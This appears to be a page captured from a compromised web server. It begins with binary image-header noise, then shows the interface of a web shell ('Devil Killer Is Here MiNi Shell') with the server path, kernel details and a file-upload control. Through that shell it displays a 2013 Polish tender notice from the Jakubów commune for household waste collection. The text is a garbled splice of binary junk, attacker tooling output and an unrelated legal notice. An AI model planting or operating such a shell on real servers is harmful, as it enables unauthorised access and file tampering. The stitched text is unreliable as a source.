JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130521/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130521/84075-N-2013.html

<p class="kh_header"><b>Jakubów: Przetarg nieograniczony na Odbiór  i zagospodarowanie odpadów komunalnych pochodzących z nieruchomości zamieszkałych na terenie gminy Jakubów</b><br>
<b>Numer ogłoszenia: 84075 - 2013; data zamieszczenia: 21.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Jakubów , Jakubów 55, 05-306 Jakubów, woj. mazowieckie, tel. 025 7579190, faks 025 7579190.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.jakubow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na Odbiór  i zagospodarowanie odpadów komunalnych pochodzących z nieruchomości zamieszkałych na terenie gminy Jakubów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Odbiór  i zagospodarowanie wskazanych w dalszej części opisu przedmiotu zamówienia odpadów komunalnych pochodzących z nieruchomości, na których zamieszkują mieszkańcy położonych  na terenie gminy Jakubów sposób zgodny z przepisami ustawy z dnia 13  września  1996r.
o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2012 r. poz. 391 z późń. zm.), ustawy o odpadach z dnia 14 grudnia 2012r. (Dz. U. 2013r  poz. 21), zapisami Wojewódzkiego Planu Gospodarki odpadami, przyjętego uchwałą Sejmiku Województwa Mazowieckiego nr 211/12  z dnia 22.10.2012 roku w sprawie  uchwalenia Wojewódzkiego Planu Gospodarki odpadami dla Mazowsza na lata 2012- 2017 z uwzględnieniem lat  2018-2023z załącznikami oraz przepisami Regulaminu utrzymania czystości i porządku na terenie Gminy Jakubów a  także innymi przepisami prawa ustawowego i miejscowego.

Charakterystyka Gminy Jakubów:
1.Powierzchnia gminy wynosi 8 732 ha ( 87,32 km2 ),
2.Liczba mieszkańców na terenie gminy Jakubów wynosi 5 135 osób. Szacuje się, że w czasie trwania umowy liczba mieszkańców może wzrosnąć.
3.Gmina liczy 26 miejscowości: Aleksandrów, Anielinek, Antonina, Brzozówka, Budy Kumińskie, Góry, Izabelin, Jakubów, Jędrzejów Nowy, Jędrzejów Stary, Józefin, Kamionka, Leontyna, Ludwinów, Łaziska, Mistów, Moczydła, Nart, Przedewsie, Rządza, Szczytnik, Strzebula, Turek, Tymoteuszew, Wiśniew,  Wola Polska.
4.Szacowana ilość budynków jednorodzinnych wynosi ok.1500.
5.Ilość wytworzonych odpadów na terenie Gminy Jakubów w 2012 roku zgodnie z danymi ze sprawozdań wynosi 392 (Mg).

Zakres rzeczowy przedmiotu zamówienia:
1.Wykonawca zobowiązany jest do odbioru i zagospodarowania każdej ilości odpadów komunalnych wytworzonych i wystawionych  przez wszystkich właścicieli nieruchomości zamieszkanych, w tym:    
a.niesegregowanych (zmieszanych) odpadów komunalnych,                                                                                    
b.papieru i tektury (w tym opakowania, gazety, czasopisma itp.),
c.tworzywa sztucznego - plastik,
d.szkła,
e.metalu,
f.odpadów  komunalnych - bytowych,
g.popiołu,
h.odpadów zielonych,
i.odpadów  wielomateriałowych,
j.odpadów wielkogabarytowych,
k.zużytych opon,
l.zużytego sprzętu elektrycznego i elektronicznego,
2.Odpady  odbierane są  przez przedsiębiorcę sprzed nieruchomości, w terminach ustalonych  
    harmonogramem. Właściciel nieruchomości ma obowiązek wystawić je przed wejście na teren 
    nieruchomości. W przypadku zabudowy kolonijnej oraz gdy niemożliwy jest  dojazd do 
    nieruchomości (śnieg, grząska droga, droga prywatna, zbyt wąska droga itp.) właściciel 
    nieruchomości zobowiązany jest dostarczyć odpady do drogi głównej publicznej  
    przebiegającej przez  miejscowość.     
3.Wykonawca po każdorazowym odbiorze odpadów pozostawi przy wejściu na nieruchomość nowe puste 
    worki w ilości odpowiadającej liczbie odebranych worków.   
4.Wykonawca zobowiązany jest do odbierania bezpośrednio z terenu ok. 1500 nieruchomości 
    zamieszkanych w tym 4 Szkoły Podstawowe i Gimnazjum, Urząd Gminy i Ośrodek Zdrowia   
    następujących frakcji odpadów komunalnych z częstotliwością:
a.raz w miesiącu - odpady komunalne-bytowe (kuchenne), niesegregowane (zmieszane) odpady komunalne, popiół  i odpady zielone
b.raz w miesiącu - tworzywa sztuczne,  szkło, makulatura , metale i odpady wielomateriałowe 
c.dwa razy w roku - odpady  wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny, zużyte opony
5.Wykonawca dostarczy przed dniem 01 lipca 2013 r. właścicielom nieruchomości  zamieszkanych   worki 
    na  odpady  segregowane przekazane mu przez Zamawiającego. 
     Worki do selektywnej zbiórki odpadów będą oznakowane napisami określającymi rodzaj odpadów na jaki 
     są przeznaczone w ilości 1 kompletu,
6.Wykonawca zobowiązany jest do odbierania odpadów z poszczególnych nieruchomości zgodnie z 
    ustalonym przez Wykonawcę i zatwierdzonym przez Zamawiającego harmonogramem wywozu.  
   Wykonawca jest obowiązany do wykonania i przedstawienia harmonogramu wywozu odpadów w terminie 
   7 dni od daty  podpisania umowy, a następnie w ciągu 14 dni od dnia przekazania informacji przez 
   Zamawiającego o jego akceptacji, dostarczy właścicielom nieruchomości. Za dostarczenie harmonogramu 
   należy uznać jego   pozostawienie  w skrzynce pocztowej lub razem z workami na odpady segregowane. 
   Wszelkie zmiany  harmonogramu będą wymagały zgody Zamawiającego, a Wykonawca będzie 
   zobowiązany do dostarczenia  zmienionych harmonogramów do każdej nieruchomości objętej odbiorem 
   odpadów komunalnych.
7.Odbiór odpadów komunalnych od właścicieli nieruchomości Wykonawca powinien realizować 
    w godzinach 7.00-20.00.
8.Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami komunalnymi 
       i  innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w trakcie 
       realizacji usługi wywozu.
9.Wykonawca jest obowiązany do realizacji reklamacji (nieodebranie z nieruchomości odpadów zgodnie 
       z harmonogramem, niedostarczenie worków na odpady segregowane itp.) w przeciągu 24 godzin od 
      otrzymania zawiadomienia e-mailem lub telefonicznie od Zamawiającego. Wykonanie reklamacji należy  
      niezwłocznie potwierdzić e-mailem lub telefonicznie na adres Zamawiającego.
10 System odbierania odpadów komunalnych nie obejmuje odpadów powstających w wyniku prowadzenia 
      działalności gospodarczej, odpadów  budowlanych i poremontowych, odpadów pochodzących 
      z cmentarzy, przeterminowanych leków i baterii, odpadów  medycznych i weterynaryjnych, odpadów 
      z  posesji niezamieszkałych np. domków letniskowych.
11.Wykonawca zobowiązany jest do:
a.odbioru, wywozu i zagospodarowania wszystkich frakcji odpadów komunalnych dostarczonych przez mieszkańców gminy Jakubów  ze Stacjonarnego Punktu Selektywnej Zbiórki Odpadów
zlokalizowanego w miejscowości Jakubów  64B.
Częstotliwość odbioru w/w odpadów odbywać się będzie w ciągu dwóch dni od zgłoszenia
             pisemnego, faksowego lub e-mailowego przez Zamawiającego - nie częściej niż raz na
             miesiąc. Wykonawca podczas odbioru odpadów zobowiązany jest do ich ważenia w punkcie
             wagowym zlokalizowanym na terenie Stacjonarnego Punktu Selektywnej Zbiórki Odpadów
            w obecności  pracownika Punktu. Ilość oraz rodzaj odebranych odpadów potwierdza na piśmie 
            pracownik Punktu oraz osoba upoważniona  przez   Wykonawcę,
b.zorganizowania raz w ciągu trwania zamówienia punktu mobilnego selektywnej zbiórki odpadów w każdej miejscowości, dla frakcji odpadów takich jak: odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny, zużyte opony,  za wyjątkiem odpadów budowlanych i rozbiórkowych, 
c.ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze i przekazywania dokumentacji pomiarów Zamawiającemu w okresach miesięcznych. Wykonawca jest zobowiązany do bieżącego prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach i przekazywania kopii dokumentacji Zamawiającemu w terminie do 10  dnia  następnego miesiąca,
d.kontroli realizowanych przez właściciela nieruchomości obowiązków w zakresie selektywnego zbierania odpadów komunalnych, a w przypadku ich niedopełnienia zobowiązany jest przyjąć odpady jako zmieszane odpady komunalne i niezwłocznie pisemnie powiadomić o tym Zamawiającego, nie później niż w ciągu 3 dni (art. 9f ustawy o utrzymaniu czystości i porządku w gminach). Do informacji Wykonawca zobowiązany będzie załączyć dokumentację zdjęciową umożliwiającą identyfikację nieruchomości z rejestracją daty i godziny.
e.przekazywania odebranych zmieszanych odpadów komunalnych, pozostałości z sortowania odpadów komunalnych oraz odpadów zielonych do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK) zgodnie zapisami Wojewódzkiego Planu Gospodarki odpadami, przyjętego uchwałą Sejmiku Województwa Mazowieckiego nr 211/12  z dnia 22.10.2012 roku oraz do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r., o odpadach (Dz. U. z 2013 r. poz. 21) oraz przedstawienia Zamawiającemu dowodów potwierdzających wykonanie tych czynności  tj. karty przekazania odpadów w terminie 10 dni od zakończenia danego miesiąca, 
f.bieżącego przekazywania adresów nieruchomości, na których powstały odpady, a nie zostały ujęte w bazie danych prowadzonej przez Zamawiającego oraz do przekazywania Zamawiającemu faktur
       z kartami przekazania odpadów, wykazów nieruchomości  zobowiązanych do selektywnej  
       zbiórki odpadów, a nie przeprowadzających jej (niesegregujących odpadów),  w terminie1 0 dni od  
      zakończenia danego miesiąca.
g.uzyskiwania wymaganych przepisami prawa poziomów odzysku odpadów komunalnych z uwzględnieniem poziomów odzysku wskazanych w ustawie z dnia 13 września1 996r. o utrzymaniu czystości i porządku w gminach (Dz.U . z 2012 r , poz. 397 z późń. zm.),Rozporządzeniu Ministra Środowiska z dnia 29 maja 2012r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012r., poz.645) oraz Rozporządzeniu Ministra Środowiska z dnia 25 maja 2012 r w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji  przekazywanych  do składowania oraz sposobu obliczania poziomu  ograniczenia masy tych odpadów( Dz.U.  z 2012r , poz.6 76 ),
h.spełniać warunki określone w Rozporządzeniu Ministra Środowiska z dnia 25 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości ( Dz. U z 2013 r. poz. 122 ) między innymi: 
a.posiadać bazę magazynowo - transportową usytuowaną w Gminie Jakubów, lub w odległości nie większej niż 60  km od granicy Gminy Jakubów, na terenie, do którego posiada tytuł prawny,
b.baza magazynowo - transportowa musi być wyposażona w miejsca przeznaczone do parkowania pojazdów, pomieszczenie socjalne dla pracowników odpowiadające ilości zatrudnionych osób, miejsce do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych oraz legalizowaną samochodową wagę najazdową - w przypadku, gdy na terenie bazy następuje magazynowanie odpadów,
c.załadunek i transport odpadów będzie odbywał się za pomocą odpowiedniego sprzętu oraz środków transportu, będących w dyspozycji Wykonawcy spełniających wymogi opisane w w/w Rozporządzeniu,
d.wykonawca zapewnia właściwy stan sanitarny (mycie i dezynfekcję  pojazdów używanych
             podczas realizacji zamówienia.
i.przedkładania Zamawiającemu dokumentów potwierdzających odzysk i recykling sporządzonych zgodnie z rozporządzeniem Ministra Środowiska z dnia 19.12.2006 r w sprawie dokumentów potwierdzających odrębnie odzysk i odrębnie recykling - w terminie do końca miesiąca następującego po kwartale, którego dotyczy.
j.przedkładania Zamawiającemu kwartalnych sprawozdań zgodnych z art.9n ust.1-3 ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminach (Dz.U. z 2012 r poz.391 z późn. zm)
k.przestrzegania podczas trwania umowy przepisów prawnych a, w szczególności:
1.ustawy z dnia 14 grudnia 2012r. o odpadach (Dz. U. z 2013r , poz. 21, z późń. zm.)
2.ustawy z dnia 13 września1996r  o utrzymaniu czystości i porządku w gminach( Dz.U. z 2012 r . poz. 391 z późń. zm.)
3.ustawy z dnia 2 lipca 2004 r o swobodzie  działalności gospodarczej (Dz.U z 2010 r.  Nr 220. poz.1447 ze zm.),
4.ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz.U .z 2008 r. Nr 25, poz. 150 
ze zm.)
5.ustawy z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznymi elektronicznym (Dz. U. z 2005r .,Nr 180,poz.1495 ze zm.),
6.ustawy z dnia 24 kwietnia 2009 r o bateriach i akumulatorach (D z.U. z 2009 r.Nr 79, poz. 666 ze zm.
7.ustawy z dnia 18 lipca 2001r . Prawo wodne( Dz.U. z 2012 r. ,poz.145 ze zm.),
8.ustawy z dnia 18.09.2001r. o podpisie elektronicznym ( Dz.U. z 2001  r. Nr 130, poz.1450 ze zm.)
9.ustawy z dnia 29.08.1997 r. o ochronie danych osobowych ( Dz.U. z 2002r Nr 101, poz.926 ze zm.),
10.ustawy z dnia 20.06.1997 r. Prawo o ruchu drogowym (Dz.U.z 2012 r., poz.1137 ze zm.)
11.rozporządzenia Ministra Środowiska z dnia 16 czerwca 2009 r w sprawie bezpieczeństwa i higieny pracy przy gospodarowaniu odpadami (Dz.U. z 2009 r., nr 104 poz.868),
12.rozporządzenia Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji i odpadów (Dz. U. 2010 r,, nr 249 poz, 1673),
13.rozporządzenia Ministra Środowiska z dnia 8 grudnia 2010 r w sprawie zakresu informacji oraz wzorów  formularzy służących do sporządzania i przekazywania zbiorowych zestawień danych 
o odpadach( Dz.U . 2010r ., nr 249 poz.1674),
14.rozporządzenia Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. 2001 r., nr 112 poz. 1206),
15.rozporządzenia Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów  recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U z dnia 11 czerwca 2012 r., poz. 645),
16.rozporządzenia Ministra Środowiska z dnia 15 maja 2012 r  w sprawie wzorów sprawozdań 
o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań 
z zakresu gospodarowania odpadami komunalnymi( Dz.U . z dnia 5 czerwca 2012 r., poz. 630),
17.rozporządzenia Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania o raz sposobu obliczania poziomu ograniczenia masy tych odpadów ( Dz.U. z dnia 18 czerwca 2012 r., poz.676),
18.rozporządzenia Ministra Środowiska z dnia 11.09,2012 r. w sprawie mechanicznobiologicznego przetwarzania zmieszanych odpadów komunalnych (Dz.U.  z 2012r, poz. 1052),
19.rozporządzenia Ministra Środowiska z dnia 25 stycznia 2013 r. w sprawie szczegółowych wymagań 
w zakresie odbioru odpadów komunalnych od właścicieli nieruchomości ( Dz. U z 2013 r. poz. 122 )
20.Wojewódzkiego Planu Gospodarki Odpadami, przyjętego uchwałą Sejmiku Województwa Mazowieckiego nr 211/12 z dnia  22.10.2012 roku w sprawie uchwalenia Wojewódzkiego Planu Gospodarki Odpadami dla Mazowsza na lata 2012-2017 z uwzględnieniem lat  2018-2023 
z załącznikami,
21.uchwały nr XXV/150/2013 Rady Gminy Jakubów z dnia 28 stycznia 2013 roku w sprawie  przyjęcia Regulaminu Utrzymania Czystości i Porządku na terenie gminy Jakubów
22.dyrektywy Parlamentu Europejskiego i Rady 2008/98/WE  z dnia 19 listopada 2008 r. w sprawie odpadów oraz uchylającej niektóre dyrektywy (Dz.U .UE.L 2008.312.3),
23.innych aktów normatywnych obowiązujących na obszarze Gminy Jakubów zawierających powszechnie obowiązujące przepisy prawa.
14.Zakazuje się Wykonawcy mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi    
      odpadami komunalnymi odbieranymi od właścicieli nieruchomości zamieszkałych na terenie Gminy  
      Jakubów.
15.W przypadku stwierdzenia, że usługi wykonywane są niezgodnie z obowiązującymi przepisami 
      Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy 
     Wykonawcy z naliczeniem kary umownej.
16.Wykonawca ponosi odpowiedzialność za zawinione szkody w majątku Zamawiającego lub osób trzecich  
       w trakcie odbioru odpadów komunalnych. 
17.Przed rozpoczęciem realizacji zamówienia Zamawiający dostarczy Wykonawcy szczegółowy wykaz   
      adresów nieruchomości, objętych zamówieniem, ze wskazaniem, które z nieruchomości objęte są  
      segregacją odpadów, a które nie. W pozostałych przypadkach wykazy nieruchomości przekazywane będą  
     przez Zamawiającego (w formie pisemnej) do końca miesiąca poprzedzającego odbiór.
18.Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi odpadami   
      zgodnie z przepisami obowiązującymi  w tym zakresie. Dotyczy to  m.in. ewentualnego przeładunku 
     odpadów, transportu odpadów, spraw  formalno-prawnych  związanych z  odbieraniem i dostarczaniem 
     odpadów uprawnionemu przedsiębiorcy prowadzącemu działalność w zakresie odzysku lub 
     unieszkodliwiania odpadów komunalnych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.20.00-9, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie Aktualnego wpis do rejestru działalności regulowanej prowadzonego przez Wójta Gminy Jakubów   
   w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości 
Aktualnego zezwolenie na prowadzenie działalności  w zakresie transportu i zbierania odpadów, wydane przez 
   właściwy organ zgodnie z ustawą o odpadach, w zakresie objętym przedmiotem  zamówienia.
Aktualnego zezwolenie na prowadzenie działalności w zakresie odzysku lub unieszkodliwiania  odpadów 
    komunalnych lub potwierdzone na piśmie gotowość przyjęcia odpadów komunalnych przez przedsiębiorcę 
    prowadzącego działalność w zakresie odzysku lub unieszkodliwiania odpadów. Miejsca odzysku lub 
    unieszkodliwiania odpadów, o których mowa  powinny spełniać  warunki określone w ustawie z dnia 
   14 grudnia 2012r. o odpadach, ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w 
   gminach,
7. Wpis do rejestru zbierających zużyty sprzęt elektryczny i elektroniczny prowadzonego przez Głównego  
    Inspektora  Ochrony Środowiska.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,   
    głównych usług, w okresie trzech lat przed upływem terminu składania ofert o dopuszczenie do 
   udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
   wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów,  na rzecz których usługi 
   zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane  należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie wykazu wyposażenia zakładu, urządzeń technicznych dostępnych wykonawcy w celu wykonania 
   zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami umożliwiające odbieranie
   odpadów komunalnych od właścicieli nieruchomości zgodnie z Rozporządzeniem Ministra 
   Środowiska z dnia 11 stycznia 2 013 roku w sprawie szczegółowych wymagań w zakresie 
   odbierania odpadów komunalnych od właścicieli nieruchomości (D z. U. z dnia 25 stycznia 2013 r.,poz, 122 ) oraz dokument potwierdzający prawo do dysponowania terenem dotyczącym bazy magazynowo - transportowej usytuowanej w Gminie Jakubów, lub w odległości nie większej niż 60  km od granicy Gminy Jakubów,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane  
     uprawnienia , jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia tego warunku nastąpi na podstawie opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający,  że Wykonawca jest  
      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej  z 
     przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

